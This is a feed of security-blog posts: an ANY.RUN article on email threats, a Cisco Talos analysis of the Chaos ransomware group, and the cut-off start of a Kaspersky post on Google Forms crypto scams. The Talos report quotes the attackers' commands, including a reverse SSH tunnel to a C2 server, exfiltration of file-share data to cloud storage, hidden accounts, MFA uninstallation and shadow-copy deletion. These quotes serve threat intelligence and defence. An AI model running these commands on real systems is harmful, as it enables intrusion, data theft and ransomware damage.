Top Email Security Risks for Businesses and How to Catch Them Before They Cause Damage 

Even with all the new ways we stay in touch, Slack, Teams, DMs, email is still the backbone of business communication. That also makes it one of the easiest ways in for attackers. 

A single message with the right subject line or attachment can lead to stolen logins, malware infections, or even full network access. It happens so fast that many employees don’t notice until it’s too late. 

Let’s take a closer look at the most common security risks businesses face when it comes to email, and what you can do to avoid falling into those traps. 

Why Email is Still a Big Risk for Businesses 

For security teams, email is often the most unpredictable part of the attack surface. Firewalls, EDR, and filters help but one convincing message can still get through. 

Here are a few reasons why email remains a top security concern: 

  • It’s too familiar: Employees open dozens (or hundreds) of emails a day. One click on a fake invoice or calendar invite is all it takes. 
  • Threats are getting smarter: Attackers use trusted services like SharePoint or QR codes. They design malware that doesn’t trigger alerts. 
  • Some attacks don’t need clicks: Zero-click exploits can launch as soon as the message is previewed. 
  • Traditional tools miss behavior: Filters and antivirus might scan attachments, but they don’t show what the file does once it’s opened. 

To reduce risk, businesses need visibility into what’s happening behind the scenes; what gets triggered, what connects where, and what the real intent is. 

Sandboxes like ANY.RUN makes that possible. It lets security teams safely detonate suspicious emails and watch every step of the attack before it reaches users or spreads across the network. 

Check Out Real Email Attacks That Target Businesses Now 

The following real-world cases, captured inside ANY.RUN’s sandbox, show how today’s most common email threats actually unfold. From malware-laced attachments to zero-click exploits, these examples reveal the tactics that put businesses at risk every day. 

1. Malware Attachments: A Hidden Threat in Everyday Emails 

Malware-laced attachments remain one of the most effective ways for attackers to break into corporate systems. According to Verizon’s 2024 Data Breach Report, more than 50% of successful email-based attacks involved malicious attachments, often disguised as invoices, contracts, or shipping documents. All it takes is one click from a distracted employee. 

These files can open the door to data theft, ransomware, and full system compromise. 

Here’s a real-world example that shows exactly how this happens, captured in an ANY.RUN sandbox session where the entire attack chain unfolds in front of you. 

Real Case: A Dangerous PDF That Looks Legit 

Suspicious PDF attachment analyzed inside ANY.RUN sandbox 

In this analysis, the file is named Rauscher-Fahrzeugeinrichtungen.pdf; harmless enough at first glance. But once opened, it immediately starts reaching out to a phishing page hosted on SharePoint. That’s your first red flag. 

Why SharePoint? Because it’s a legitimate Microsoft domain, often trusted by corporate environments. Hosting a phishing link there increases the chance of bypassing security filters and convincing the user to trust it. 

Detect threats faster with ANY.RUN’s Interactive Sandbox
See full attack chain in seconds for immediate response 



Launch analysis


Phishing page with malicious attachment hosted on SharePoint 

ANY.RUN flags this right away. In the Threats panel, we see it’s marked as “Social Engineering Attempted” and tied to MITRE Technique T1566 (Phishing). 

Threat details exposed by ANY.RUN sandbox 

Digging deeper, the PDF contains obfuscated JavaScript; a common trick used to hide malicious code from basic scanners. The user doesn’t see anything unusual, but Adobe Acrobat and Microsoft Edge are triggered, opening a fake Microsoft login page. These processes attempt to communicate with external servers and interact with the system in suspicious ways. 

Fake Microsoft page used to steal credentials from potential victims 

The goal of the attack here is to steal credentials using social engineering and invisible redirections. Everything about this PDF is designed to trick both the user and the security software. 

Without a sandbox, this kind of attack is easy to miss. The file looks like a regular PDF, the hosting domain is trusted, and the user doesn’t see anything unusual until it’s too late. 

But with ANY.RUN: 

  • Your team sees the entire attack flow in real time 
  • Threats are automatically labeled and enriched with context 

2. Credential Theft: When One Click Gives Away Everything 

Login credentials are gold for attackers. With the right email and a well-placed link, they can trick employees into handing over usernames and passwords, sometimes without even realizing it. 

In fact, spearphishing links (MITRE T1566.002) remain one of the most popular ways to steal credentials, especially those tied to business accounts like Microsoft 365 or Gmail. 

Here’s one case from the ANY.RUN sandbox that shows exactly how fast it can happen. 

Real Case: Phishing with Tycoon 2FA 

Phishing email with Tycoon 2FA analyzed inside ANY.RUN sandbox 

This phishing campaign used a platform called Tycoon 2FA; a tool designed to bypass multi-factor authentication on Microsoft and Google accounts. It all starts with a single malicious link sent via email. 

Once the victim clicks the link, the system opens it in the browser, but that’s just the beginning. In the sandbox, we can see multiple Microsoft Edge processes launch one after another, which is already suspicious. 

Several Edge processes (msedge.exe) running in parallel, often a sign of automated phishing behavior 

Then things get weirder. The sandbox also shows that these processes are modifying browser cache and user data folders, which normally wouldn’t happen during casual browsing. 

The system also starts making changes in the registry, a place Windows uses to store settings. This often points to deeper system manipulation. 

Registry keys under HKEY_CURRENT_USERSoftwareMicrosoft are being edited silently by the browser; activity that would never happen during normal use. 

Eventually, the victim is redirected to a fake Microsoft login page. It looks completely legitimate, but it’s hosted on a malicious domain. If the victim enters their credentials here, the attacker gets immediate access. 

Fake Microsoft login page exposed inside interactive sandbox 

The sandbox also catches a possible connection to the Tor network, which attackers often use to hide where the stolen data is being sent. 

Phishing links like this don’t leave much trace but a sandbox catches what users and filters miss. With ANY.RUN, you see how the attack really works, so you can block it smarter, faster, and for good. 

3. Zero-Day Exploits: When Hackers Use the Tools You Haven’t Patched For 

Some attacks don’t rely on tricking users; they rely on software flaws that no one even knows about yet. These are zero-day exploits, and they’re dangerous because there’s no fix when they first appear. 

One of the most recent examples is CVE-2024-43451, a Windows vulnerability that leaks a user’s NTLMv2 hash; a sensitive authentication value. All it takes is interacting with a specially crafted shortcut file. Just hovering, renaming, or deleting it can silently trigger a connection to a remote server controlled by the attacker. 

Once the hash is captured, it can be reused to impersonate the user in a classic pass-the-hash attack, giving intruders a way to move through the network with elevated access. 

Real Case: Phishing with Zero Interaction 

In this sandbox session, attackers exploit the CVE-2024-43451 vulnerability to launch a malicious HTML file from an .eml email attachment. The user doesn’t need to click a link or run anything manually; just opening the email is enough to trigger the chain. 

The attacker sends an .eml email with a zipped attachment that silently triggers system activity when previewed 

Microsoft Edge launches instantly and redirects the user to a phishing site, without any additional interaction. This is a textbook example of a zero-interaction phishing attack, where the victim is compromised simply by viewing the message 

Inside the sandbox, we also see that the malicious file triggers WinRAR.exe, which in turn executes hidden commands tied to the CVE-2024-43451 vulnerability. 

ANY.RUN detects the use of CVE-2024-43451 and flags the process as 100/100 malicious due to scheduled task abuse and registry tampering

But that’s not all. The exploit leads to a silent SMB connection; a network communication that sends the victim’s NTLMv2 hash to an external server. This hash can later be used in pass-the-hash attacks, letting intruders move through a network as if they were the victim. 

ANY.RUN shows a successful connection to an external SMB server, exposing a potential corporate privacy violation 

This kind of attack is especially dangerous because it doesn’t rely on clicks or user mistakes. It looks like a normal email but behind the scenes, it opens the door to credential theft and internal access. 

With ANY.RUN, the entire chain was exposed in under one minute. That kind of speed gives your security team a real advantage, cutting detection timereducing investigation effort, and preventing costly breaches before they unfold. 


ANY.RUN cloud interactive sandbox interface

Sandbox for Businesses

Boost performance of your SOC with the Enterprise plan designed for SMBs, MSSPs, enterprise companies, and government organizations.



4. Quishing: When a QR Code Becomes the Attack 

QR codes have become part of everyday life; menus, logins, verifications. And attackers know it. That’s what makes Quishing (QR phishing) so effective. 

Instead of sending a suspicious link, attackers embed a QR code into an email, document, or image. When scanned, it sends the user to a fake website, often mimicking Microsoft 365, voicemail systems, or banking portals, where credentials can be stolen or malware downloaded. 

As the code is scanned on a phone, it often bypasses email filters and endpoint protection entirely. Since mobile devices are typically outside the company’s full security stack, they make an easy target. 

Real Case: Fake Voicemail Lures via QR Code 

ANY.RUN sandbox exposing the malicious URL in seconds 

In this ANY.RUN sandbox session, the attack comes in the form of an email telling the user they have a voicemail waiting, asking them to scan a QR code to listen. 

Malicious URL discovered in the Static discovering section inside ANY.RUN sandbox 

Thanks to the sandbox’s automated interactivity, analysts don’t need to manually extract or decode anything. The QR code is scanned automatically, and the URL is uncovered; all in just a few seconds. 

That means faster insights, less analyst effort, and a clearer view of where the attack leads, even when the delivery method tries to avoid traditional defenses. For businesses, it’s a smarter way to catch threats that bypass filters and target mobile users directly. 

5. CVE-2017-11882: Exploiting a Known Vulnerability in Microsoft Office 

CVE-2017-11882 is a remote code execution (RCE) vulnerability in a legacy component of Microsoft Office; the Equation Editor (eqnedt32.exe). This flaw is caused by a stack buffer overflow, which occurs due to improper handling of objects in memory. When exploited, it allows attackers to execute arbitrary code on the victim’s system. 

All it takes is for the user to open a specially crafted Office document, typically in .RTF or .DOC format. 

Real Case: Triggering the Exploit via Malicious Email 

Malicious email that triggers the CVE-2017-11882 vulnerability inside ANY.RUN sandbox 

In this sandbox session, the malicious payload is delivered via an email containing a .eml attachment. This attachment includes an Office document that exploits CVE-2017-11882 through the Equation Editor. 

ANY.RUN identified the exploit within seconds of the document opening, flagging the vulnerable process and its suspicious behavior right away. By catching CVE-2017-11882 so early, teams can reduce mean time to detect (MTTD), avoid time-consuming manual investigation, and respond before the threat spreads. 

Exploitation of CVE-2017-11882 through the Equation Editor exposed in the MITRE ATT&CK section of ANY.RUN sandbox 

As soon as the victim opens the file, the EQNEDT32.EXE process is triggered, kicking off a series of malicious actions: 

  • Reading system parameters and configurations 
  • Accessing stored certificates and proxy settings 
  • Creating and dropping new files 
  • Establishing connections to external servers 
EQNEDT32.EXE modifying security-related system files 

Strengthen Your Email Security Before the Next Threat Hits 

The above-mentioned attacks are happening right now, in inboxes just like yours. Some rely on tricking users. Others don’t need user interaction at all. And in many cases, traditional defenses simply don’t catch them in time. 

This is exactly where ANY.RUN’s sandbox comes in handy. With real-time sandbox analysis, your team can uncover how threats behave, understand their full impact, and stop them before they spread. 

Here’s what you gain when ANY.RUN becomes part of your email security workflow: 

  • Faster detection of threats and reduced Mean Time to Detect (MTTD) 
  • Full visibility into what files and links actually do without any guesswork 
  • Less manual effort for analysts, thanks to automated interactivity 
  • Lower risk of breaches, data loss, and business disruption 
  • Shareable, detailed reports for internal teams, clients, or compliance needs 

Try ANY.RUN now and take back control of your email security. 

About ANY.RUN 

ANY.RUN is relied on by more than 500,000 cybersecurity professionals and 15,000+ organizations across finance, healthcare, manufacturing, and other critical industries. Our platform helps security teams investigate threats faster and with more clarity. 

Speed up incident response with our Interactive Sandbox: analyze suspicious files in real time, observe behavior as it unfolds, and make faster, more informed decisions. 

Strengthen detection with Threat Intelligence Lookup and TI Feeds: give your team the context they need to stay ahead of today’s most advanced threats. 

Want to see it in action? Start your 14-day trial of ANY.RUN today → 

The post Top Email Security Risks for Businesses and How to Catch Them Before They Cause Damage  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Unmasking the new Chaos RaaS group attacks

  • Cisco Talos Incident Response (Talos IR) recently observed attacks by Chaos, a relatively new ransomware-as-a-service (RaaS) group conducting big-game hunting and double extortion attacks.  
  • Chaos RaaS actors initiated low-effort spam flooding, escalating to voice-based social engineering for access, followed by RMM tool abuse for persistent connection and legitimate file-sharing software for data exfiltration. 
  • The ransomware utilizes multi-threaded rapid selective encryption, anti-analysis techniques, and targets both local and network resources, maximizing impact while hindering detection and recovery. 
  • Talos believes the new Chaos ransomware is unrelated to previous Chaos builder-generated variants, as the group uses the same name to create confusion.  
  • Talos assesses with moderate confidence that the new group is likely formed by former members of the BlackSuit (Royal) gang, based on similarities in the ransomware’s encryption methodology, ransom note structure, and the toolset used in the attacks. 

Victimology 

Unmasking the new Chaos RaaS group attacks

The new Chaos has impacted a wide variety of business verticals and seems to be opportunistic without focusing on any specific verticals. Victims have been predominantly in the U.S. and a fewer in the UK, New Zealand and India according to the actor’s data leak site. 

Who is Chaos? 

Chaos is a relatively new RaaS group that emerged as early as February 2025. The Chaos group is actively promoting their cross-platform ransomware software in the dark web Russian-speaking cybercriminal forum Ransom Anon Market Place (RAMP) and is seeking collaboration with affiliates. They emphasize that the new Chaos ransomware software is compatible with Windows, ESXi, Linux and NAS systems, with features such as individual file encryption keys, rapid encryption speeds and network resource scanning — all with a strong emphasis on high-speed encryption and robust security measures.  

Additionally, the group provides an automated panel for managing targets and communications, which requires a paid entry fee that is refundable upon the first case of payment. They have also clearly stated in their dark web forum post that they explicitly avoid collaborating with BRICS/CIS countries, hospitals and government entities. 

Furthermore, the group is offering an onion URL for potential affiliates to register for an account with the Chaos group and has provided a support email address at “win88@thesecure[.]biz”. 

Talos IR observed that the group has been launching big-game hunting and double extortion attacks. Like other operators in the double extortion space, Chaos also runs a data leak site to disclose the stolen data of victims who fail to meet their ransom demands. 

Unmasking the new Chaos RaaS group attacks
Figure 2. Chaos data leak site homepage.

Chaos encrypts the victim’s environment, uses “.chaos” as the file extension for the encrypted files, and drops the ransom note “readme.chaos[.]txt”. In the ransom note, the actor claims that they attempted to perform security testing in the victim’s environment and were successful in compromising it. They also threaten the victims with the disclosure of their stolen confidential data if they fail to pay the ransom amount. The actor does not leave an initial ransom demand or payment instructions in their ransom note but provides instructions to contact them using an onion URL specific to each victim. 

Unmasking the new Chaos RaaS group attacks
Figure 3. Chaos ransom note.

Talos IR observed that the actor demanded a ransom amount of $300K through the victim communication channel and offered two options. If the victim pays the amount, the actor will provide a decryptor application for targeted environments, along with a detailed report of the penetration test conducted on the victim’s environment. They also assure the victim that the stolen data will not be disclosed and will be permanently deleted, ensuring that they will not conduct repeated attacks. 

If the victim fails to pay the ransom, the actor threatens to disclose their stolen data and conduct a distributed denial-of-service (DDoS) attack on all the victim’s internet-facing services, as well as spread the news of their data breach to competitors and clients. 

Unmasking the new Chaos RaaS group attacks
Figure 4. Chaos actor demand. 

The Chaos ransomware actor is a recent and concerning addition to the evolving threat landscape, having shown minimal historical activity before the current wave of intrusions. Importantly, this new Chaos ransomware gang is not connected to the variants produced by the Chaos ransomware builder tool or its developers. To hide their identity, these threat actors have exploited the confusion within the security community regarding the name “Chaos” and its various variants and associated builder tools. This deliberate obfuscation complicates the identification and mitigation of risks posed by this emerging threat. 

Unmasking the new Chaos RaaS group attacks
Figure 5. Chaos RaaS diamond model.

Recent attack methodologies and notable TTPs 

During our investigation of Chaos ransomware attacks, the Talos IR team observed several significant, noteworthy TTPs. 

Initial access 

T1078 – Valid Accounts 

T1598.004 – Phishing for Information: Voice Phishing (Vishing) 

The actor has gained initial access to the victim through social engineering, utilizing phishing and voice phishing techniques. The victim was initially flooded with spam emails, encouraging them to contact the threat actor via a telephone call. When the victim reaches out, the threat actor, impersonating IT security representatives, advises the victim to launch a built-in remote assistance tool on their Windows machine, specifically Microsoft Quick Assist, and instructs them to connect to the actor’s session. 

Discovery  

T1016 – System Network Configuration Discovery 

T1482 – Domain Trust Discovery 

T1033 – System Owner/User Discovery 

T1057 – Process Discovery 

T1018 – Remote System Discovery 

T1135 – Network Share Discovery 

Talos IR observed multiple commands executed by the actor in the victim environment to carry out post-compromise discovery and reconnaissance. The actor collects network configuration details, information about the domain controller and trust relationships, logged-in user data, running processes, and performs reverse DNS lookup. 

ipconfig /all  
nltest /dclist  
nltest.exe /domain_trusts  
nltest.exe /dclist:$domain  
nslookup $Internal_IP_address 
net view $Internal_IP /all 
quser.exe  
tasklist.exe   

Execution 

T1059.001 – PowerShellT1059 – Command and Scripting Interpreter 

T1047 – Windows Management Instrumentation  

The actor executed scripts and commands to perform the following actions on the victim machine, preparing the environment to download and execute malicious files and connect to the actor’s command and control (C2) server. 

  • The threat actor executes the following PowerShell command to set the working environment on the victim machine. 

powershell.exe -noexit -command Set-Location -literalPath 'C:Users$userDesktop' 

  • The actor executes the command on all the compromised machines in the victim’s network to set the Windows delivery optimization for allowing the files to be downloaded from a local server on port 8005 that are greater than 50 MB in size, ensuring the large files are downloaded efficiently from peer servers.  

PowerShell.exe -Nologo -Noninteractive - NoProfile -ExecutionPolicy Bypass; Get-DeliveryOptimizationStatus | where-object {($.Sourceurl -CLike 'hxxp[://]localhost[:]8005*') -AND (($.FileSize -ge '52428800') -or ($.BytesFromPeers -ne '0') -or (($.BytesFromCacheServer -ne '0') -and ($_.BytesFromCacheServer -ne $null)))} | select-object -Property BytesFromHttp, FileId, BytesFromPeers,Status,BytesFromCacheServer,SourceURL | ConvertTo-Xml -as string - NoTypeInformation   

  • We also observed that the actor has used “atexec” tool from the Impacket toolkit for remote command execution.  

Persistence  

T1547.001 – Boot or Logon Initialization: Registry Run Keys / Startup Folder   

T1133 – External Remote Services 

Talos IR observed that the actor has installed RMM tools such as AnyDesk, ScreenConnect, OptiTune, Syncro RMM and Splashtop streamer on compromised machines to establish persistent connection to the victim network. 

The actor executed a command to modify the Windows registry setting to hide a user account from the Windows login screen. By configuring this registry setting the user account still exists and can be used to log in using Remote Desktop Protocol (RDP) or runas, without the username being displayed on Welcome or login screen.  

cmd.exe /c reg add HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserlist /v $user_account /t REG_DWORD /d 0 /f   

To secure continuous access to the victim machines, the actor also uses net[.]exe utility to reset the passwords of the enumerated domain user accounts in the victim network. 

net[.]exe user $user_name $password /dom  

Credential access and privilege escalation 

T1555 – Credentials from Password Stores 

Talos IR observed that the threat actor executed an “ldapsearch” command remotely on the victim machine through the reverse SSH tunnel and dumped the user details from the active directory to a text file. The actor is likely attempting to steal the credentials of the privileged accounts in the victim’s active directory using the kerberoasting technique, thereby gaining elevated privilege access in the victim’s environment.  

Defense evasion 

T1036.005 – Masquerading: Match Legitimate Name or Location  

T1027 – Obfuscated Files or Information  

T1562.001 – Impair Defenses: Disable or Modify Tools  

Talos IR observed that the actor deletes the PowerShell event logs on the victim machine to evade the security controls, they also attempted to uninstall security or multifactor authentication application on the victim machine using Windows Management Instrumentation Commands (WMIC).  

cmd.EXE /c wmic product where name=$MFA_application for Windows Logon x64 call uninstall /nointeractive 

Lateral movement  

T1021.001 – Remote Services: Remote Desktop Protocol (RDP)   

T1021.004 – Remote Services: SSH  

T1021.002 – SMB/Windows Admin Shares   

Talos IR found that the actor leveraged an RDP client and Impacket, facilitating the command execution over Server Message Block (SMB) and Windows Management Instrumentation (WMI) to move laterally in the victim’s network.  

mstsc.exe /v:$remote machine hostname 
wmic /node:$host process call create “C:Usersencryptor[.]exe /lkey:"$32-bytekey" /encrypt_step:40 /work_mode:local_network” 

Collection and exfiltration  

T1005 – Data from Local System 

T1567.002 – Exfiltration Over Web Service 

T1036.004 – Masquerading: Masquerade Task or Service 

T1059.003 – Command and Scripting Interpreter: Windows Command Shell 

During our investigation, we found that the actor used GoodSync, a legitimate and widely used file synchronization and backup software, in the attack to extract the data from the victim’s machine. 

The actor has executed a command using a file synchronization or cloud upload tool masquerading as a legitimate Windows executable “wininit[.]exe” to copy data from a network file share to a threat actor-controlled remote cloud storage location.  

The command filters files on the victim machine to include only those files modified within the last year and excludes several file types, possibly to avoid large or sensitive files that may trigger detection, including: Adobe Photoshop documents, 7-Zip compressed archives, Microsoft Outlook files, image and audio files, generic database files, log files, temporary files, Hyper-V virtual hard disk files, Microsoft installer packages, executable files, dynamic-link library files, and disc image files. 

Wininit[.]exe copy --max-age 1y --exclude 
*{psd,7z, mox,pst,FIT, FIL,MOV,mdb,iso,exe,dll,wav,png,db,log,HEIC,dwg,tmp,vhdx,msi} 
[\]FS01[]data cloud1:basket123/data -q --ignore-existing --auto-confirm --multi- 
thread-streams 25 --transfers 15 --b2-disable-checksum -P 

Command and control 

T1071 – Application Layer Protocol: SSH 

T1219 – Remote Access Software  

T1105 – Ingress Tool Transfer  

The actor uses the Windows OpenSSH client to execute a command that establishes a reverse SSH tunnel from the victim machine to the actor’s C2 server with the IP address “45[.]61[.]134[.]36” and the port 443 instead of the default SSH port. The actor also attempted to disable the SSH fingerprint checking by not storing the host key in the “known_hosts” file. We spotted that the actor attempts to set up remote port forwarding, where port 12840 on the remote server is forwarded to port 12840 on the local victim machine. 

C:WINDOWSSystem32OpenSSHssh[.]exe -R :12840 -N 
userconnectnopass@45[.]61[.]134[.]36 -p 443 -o UserKnownHostsFile=/dev/null -o 
StrictHostKeyChecking=no   

Impact  

T1490 – Inhibit System Recovery   

T1486 – Data Encrypted for Impact 

Talos IR observed during investigation the evidence of the encryption command execution in the victim environment. The ransomware performs selective encryption on the targeted files on the victim machines by encrypting specific portions of the files, enhancing the speed of the encryption. It appends “.chaos” file extensions to the encrypted files on the victim machine. 

Chaos Windows encryption command: 

C:Users$filename[.]exe /lkey:"32-byte key" /encrypt_step:40 /work_mode:local_network

Chaos ransomware encryptor analysis 

The new Chaos ransomware represents an encryptor that possesses the ability to encrypt files not only across local resources but also throughout network resources. It employs anti-analysis techniques specifically designed to evade detection, alongside a multi-threaded operation that facilitates rapid encryption. This design is intended for maximum impact on targeted organizations, all while ensuring operational stealth and implementing recovery prevention capabilities.  

Talos found a few samples of Windows version of the Chaos ransomware encryptor, which are 32-bit executables that were compiled in February, March and May 2025, indicating the active operations of the Chaos group. 

In this section we explain the functionalities of the new Chaos ransomware encryptor used to target Windows machines. 

Anti-analysis techniques 

The Chaos ransomware implements a multi-layered anti-analysis technique that systematically identifies and evades a range of debugging tools, virtual machine environments, automated sandboxes and security analysis platforms through window enumeration, process monitoring and timing analysis techniques: 

  • Ransomware specifically targets and detects debugging environments by enumerating the window classes and title pattern matching the debugger application window. 
  • It detects virtual machine and sandbox environments utilizing both process enumeration and window class detection techniques.  
  • It detects various security and monitoring tools used for threat and malware analysis using process enumeration. 

All these detection evasion techniques are implemented in the ransomware by employing hash-based comparisons against precomputed signatures to avoid storing plaintext tool names that could be detected through static analysis, ensuring the malware immediately terminates execution upon detecting any analysis environment to prevent analysis. 

Configuration and initialization 

Following a successful evasion, the ransomware parses command-line configuration parameters provided by the operator during the attack. A sample encryption command is shown below: 

Encryptor[.]exe /lkey:"32-byte key" /encrypt_step:$0-100 /work_mode:$mode /ignorar_arquivos_grandes 

  • A 32-byte encryption key (‘lkey’) 
  • Target directory path (‘path’) 
  • Selective encryption percentage (‘encrypt_step’ defaulting to 30%) 
  • Operation mode (‘work_mode’ supporting local, network, or local_network combined operations) 
  • Large file handling options (‘ignorar_arquivos_grandes’) 
Unmasking the new Chaos RaaS group attacks
Figure 6. Snippet of the function parsing the encryption configuration command-line parameters. 

Simultaneously, the ransomware executes an obfuscated system command that performs shadow copy deletion to prevent file recovery through Windows System Restore. Each character of the command is stored as byte value followed by 0x0E in the binary and is decrypted during execution using the custom algorithm shown in the screenshot. 

 The decrypted volume shadow copy deletion command is shown below: 

cmd.exe /c vssadmin to delete shadows /all 

Unmasking the new Chaos RaaS group attacks
Figure 7. Snippet of the function to decrypt and execute the volume shadow copy deletion command. 

Encryption algorithm and process  

The ransomware employs hybrid cryptographic techniques utilizing Elliptic Curve Diffie-Hellman (ECDH) with Curve25519 for asymmetric operations and AES-256 for symmetric file encryption.   

In each execution, the ransomware generates a unique ECC key pair using windows CNG (Cryptography Next Generation), with the private key maintained in memory and the public key exported as ECCPUBLICBLOB format. File-specific encryption keys are derived through ECDH key agreement combined with the operator-controlled 32-byte master key and another key (generated for each encryption iteration), ensuring each file receives a unique encryption key.  

Unmasking the new Chaos RaaS group attacks
Figure 8. Function initializes the cryptographic provider.

Chaos Ransomware handles three different modes of encryption: local, network and local_network (both).  

In local encryption mode, the ransomware is configured to encrypt only the targeted set of files on the infected machine. It initiates its attempts by seeking normal access, and in the event of a failure to gain standard access, it elevates its privileges by modifying the security descriptors, followed by executing token impersonation. It accomplishes this by enumerating system processes such as svchost.exe and explorer.exe, subsequently opening process tokens. Through this method, the ransomware impersonates high-privilege security contexts, effectively bypassing file access restrictions on victim machines. 

Unmasking the new Chaos RaaS group attacks
Figure 9. Privilege escalation function of Chaos ransomware.

 The ransomware performs recursive directory traversal while skipping system-critical folders and files to prevent system instability while targeting user created documents. Folders excluded for encryption by Chaos ransomware on Windows machines include: 

  • System folders: Windows, boot, system volume information, perflogs 
  • Browser data: Mozilla, google, tor browser 
  • Application directories: Appdata, msocache, intel 
  • Maintenance folders: $recycle.bin, windows.old, $windows.~ws, $windows.~bt  

Files excluded for encryption by Chaos ransomware on Windows Machine include: 

  • Boot files: bootsect.bak, boot.ini, ntldr, bootfont.bin 
  • System files: ntuser.dat, autorun.inf, desktop.ini, ntuser.ini, ntuser.dat.log 
  • Diagnostic files: diagpkg, diagcab, diagcfg 
  • Theme files: msstyles, themepack, deskthemepack, theme 
  • Other files: Icns, lock, nomedia and files without file extensions 
  • Previously encrypted files: *.chaos extension  

In the network encryption mode, the ransomware performs  network discovery by enumerating local network interfaces, identifying private IP address ranges, generating target lists for all hosts within discovered subnets and connects to discovered machines using SMB, and enumerating and queuing the available network shares for encryption while excluding the administrative shares (ADMIN$, C$ and IPC$). This technique may allow the ransomware to propagate across entire corporate infrastructures, encrypting shared drives, network-attached storage and distributed file systems, significantly amplifying the attack’s impact. 

Chaos ransomware performs selective encryption based on the command line configuration parameter “/encrypt_step” specified by the operator during the attack. It calculates specific file offsets for encryption to optimize the encryption speed with complete file corruption. It appends metadata of 60 bytes containing the public key in ECCPUBLICBLOB format and other encryption parameters such as algorithm identifier, key data size to every encrypted file and renames the file extension with the “.chaos” extension. 

Unmasking the new Chaos RaaS group attacks
Figure 10. Snippet of the encryption function initializing “.chaos” file extensions. 

Ransom note deployment and clean-up 

The ransomware decrypts its ransom note message using a custom XOR cipher with a 25-byte key. It allocates 1310 bytes (0x51E) for the decrypted note in the machine memory and employs complex offset calculations to obfuscate the simple XOR operation. The encrypted data is decrypted in 5-byte chunks using a distinct XOR key pattern from the 25-byte key. The decrypted ransom message is written in the file “readme[.]chaos[.]txt”.  

The 25-byte key used for ransom note XOR decryption is: 

e2 80 9a d0 a3 28 65 d1 97 d0 b9 d0 94 09 3e d1 85 d1 86 1d 01 e2 80 b9 e2 

Unmasking the new Chaos RaaS group attacks
Figure 11. Snippet of the ransom note decryption function. 

After completing encryption, the ransomware executes cleanup procedures, which include worker threads termination, freeing memory buffers, releasing cryptographic resources, cleaning network connections, closing file handles, and terminating the process, ensuring the proper program termination. 

Chaos TTPs overlap with BlackSuit (Royal) ransomware  

Talos assesses with moderate confidence that the new Chaos ransomware group is either a rebranding of the BlackSuit (Royal) ransomware or operated by some of its former members. This assessment is based on the similarities in TTPs, including encryption commands, the theme and structure of the ransom note, and the use of LOLbins and RMM tools in their attacks. 

Talos IR observed that the Chaos operator utilizes configuration parameters for the encryption process during the attack, including “lkey”, “encrypt_step”, and “work_mode”. This configuration enables the ransomware to selectively encrypt both local and network resources within the victim’s environment. 

Enc.exe /lkey:"" /encrypt_step:40 /work_mode:local_network 
32-byte>

A similar encryption technique usage was seen in earlier Royal and BlackSuit ransomware attacks according to the external security reporting. Although the names of the encryption parameters used seemed different, the action remained the same. 

The table shows the encryption parameters similarities of the new Chaos and BlackSuit (Royal) ransomware. 

Chaos 

BlackSuit (Royal) 

Purpose 

 /lkey 

-id 

32-byte key 

/encrypt_step 

-ep 

Defines the portion / percentage of each targeted file to be encrypted. 

/kill_vms 

stopvm 

stops virtual machines from running on the target system 

The Chaos ransomware ransom note shares a similar theme and structure to Royal/BlackSuit, including a greeting, references to a security test, double extortion messaging, assurances of data confidentiality and an onion URL for contact. 

Unmasking the new Chaos RaaS group attacks
Figure 12. Ransom note of BlackSuit ransomware. 
Unmasking the new Chaos RaaS group attacks
Figure 13. Ransom note of Royal ransomware. 

Additionally, Talos observed the similarities in the techniques employed in the Chaos ransomware attacks with that of the BlackSuit ransomware TTPs, as reported in CISA’s StopRansomware advisory for BlackSuit (Royal) ransomware. 

Coverage  

Ways our customers can detect and block this threat are listed below.  

Unmasking the new Chaos RaaS group attacks

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.  

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.  

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.  

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.  

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.  

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles.  Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work.  Please  

contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.  

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.   

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.   

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.  

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.   

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

Snort SIDs for the threats are: 

  • Snort2: 65125, 65126 
  • Snort3: 301273 

ClamAV detections are also available for this threat: 

  • Win.Ransomware.Chaos-10045485-0 

Indicators of compromise (IOCs) 

IOCs for this threat can be found in our GitHub repository here

Cisco Talos Blog – ​Read More

How to protect yourself from Google Forms scams | Kaspersky official blog

You’ve probably filled out a Google Forms survey at least once — likely signing up for an event, taking a poll, or gathering someone else’s contacts. No wonder you did — this is a convenient and easy-to-use service backed by a tech giant. This simplicity and trust have become the perfect cover for a new wave of online scams. Fraudsters have figured out how to use Google Forms to hide their schemes, luring victims with promises of free cryptocurrency. And all the victim has to do to fall into the trap is click a link.

Free crypto is only in a scammer’s trap

Just like parents tell their kids not to take candy from strangers, we recommend being cautious about offers that seem too good to be true. Today’s story is exactly about that. Our researchers have uncovered a new wave of scam attacks exploiting Google Forms. Scammers use this Google service to send potential victims emails offering free cryptocurrency.

"The transaction for the transfer has been verified"

“The transaction for the transfer has been verified”

As is often the case, the scam is wrapped in a flashy, tempting package: victims are lured with promises of cashing out a large sum of cryptocurrency. But before you can get your payout, the scammers ask you to pay a fee — though not right away. First, you have to click a link in the email, land on a fake website, and enter your crypto wallet details and your email address (a nice bonus for the scammers). And just like that, you wave goodbye to your money.

